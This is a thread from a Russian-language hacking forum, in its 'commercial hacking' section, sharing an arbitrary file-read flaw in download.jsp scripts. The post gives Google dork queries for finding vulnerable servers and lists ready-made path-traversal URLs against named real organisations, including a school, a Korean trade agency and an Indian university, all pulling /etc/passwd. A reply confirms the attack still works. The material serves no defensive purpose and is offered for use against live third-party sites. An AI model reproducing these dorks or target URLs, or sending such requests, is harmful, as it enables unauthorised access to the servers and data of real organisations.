Reading files via download.jsp

Тема в разделе "КОММЕРЧЕСКИЙ ХАКИНГ", создана пользователем mr_v, 28 окт 2017.

  1. mr_v
    off

    mr_v I see on GOA УЧАСТНИКИ

    Сообщения:
    35
    Пол:
    Мужской
    Адрес:
    ^_^
    Репутация:
    12
    Сфера:
    Хакинг
    Уязвимость: Reading files via download.jsp
    Презентовал: mr_v
    Описание: Уязвимость позволяет скачивать любые файлы с сервера

    Поиск дырявых скриптов:
    Код:
    inurl:Download.jsp?file
    inurl:Download.jsp?path
    По мелочи:

    http://online.vasantvalley.org/utils/Download.jsp?file=passwd&path=/etc/

    http://scrm.kotra.or.kr/kydbm/include/download.jsp?FILENAME=passwd&ATCHPATH=/etc/&FILEPATH=/etc/

    http://ekalavya.it.iitb.ac.in/summe....jsp?file=/etc/passwd&fileName=TEAsE&type=pdf

    По крупнее:

    https://en.wikipedia.org/wiki/KOTRA

    Скрытый текст:
    **Скрытый текст: Для просмотра скрытого текста Вы должны иметь 15 или более сообщений.**
    https://en.wikipedia.org/wiki/Bharat_Sanchar_Nigam_Limited

    Скрытый текст:
    **Скрытый текст: Для просмотра скрытого текста Вы должны иметь 15 или более сообщений.**
    http://www2.unizo.be/waregem/downlo...d&filename=../../../../../../../../etc/passwd

    http://web.rete.toscana.it/eCompliance/portale/download.jsp?filepath=/etc/passwd

    http://www.nubicom.co.kr/download/download.jsp?file_name=../../../../../../../../../etc/passwd
     
  2. Neutron
    off

    Neutron Активно в Норе УЧАСТНИКИ

    Сообщения:
    46
    Пол:
    Мужской
    Адрес:
    127.0.0.1
    Репутация:
    19
    Сфера:
    Хакинг
    Старо как мир, но работает :cool: